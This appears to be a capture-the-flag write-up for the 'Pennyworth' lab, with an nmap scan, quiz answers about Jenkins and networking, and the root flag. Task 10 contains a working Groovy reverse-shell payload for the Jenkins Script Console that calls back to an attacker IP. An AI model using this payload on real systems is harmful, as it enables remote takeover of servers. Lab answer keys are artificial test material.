Pennyworth

Initial Scan

sudo nmap -T4 -Pn -sV -sC -v 10.129.64.37 -oA Penntyworth

Task 1

What does the acronym CVE stand for?

Answer: Common Vulnerabilities and Exposures

Task 2

What do the three letters in CIA, referring to the CIA triad in cybersecurity, stand for?

Answer: Confidentiality, Integrity, Availability

Task 3

What is the version of the service running on port 8080?

Answer: Jetty 9.4.39.v20210325

Task 4

What version of Jenkins is running on the target?

Answer: 2.289.1

Task 5

What type of script is accepted as input on the Jenkins Script Console?

Answer: Groovy

Task 6

What would the "String cmd" variable from the Groovy Script snippet be equal to if the Target VM was running Windows?

Answer: cmd.exe

Task 7

What is a different command than "ip a" we could use to display our network interfaces' information on Linux?

Answer: ifconfig

Task 8

What switch should we use with netcat for it to use UDP transport mode?

Answer: -u

Task 9

What is the term used to describe making a target host initiate a connection back to the attacker host?

Answer: reverse shell

Task 10

Submit Root Flag

String host="10.10.14.80";
int port=8008;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port); InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream(); OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()) {while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read()); while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Answer: 9cdfb439c7876e703e307864c9167a15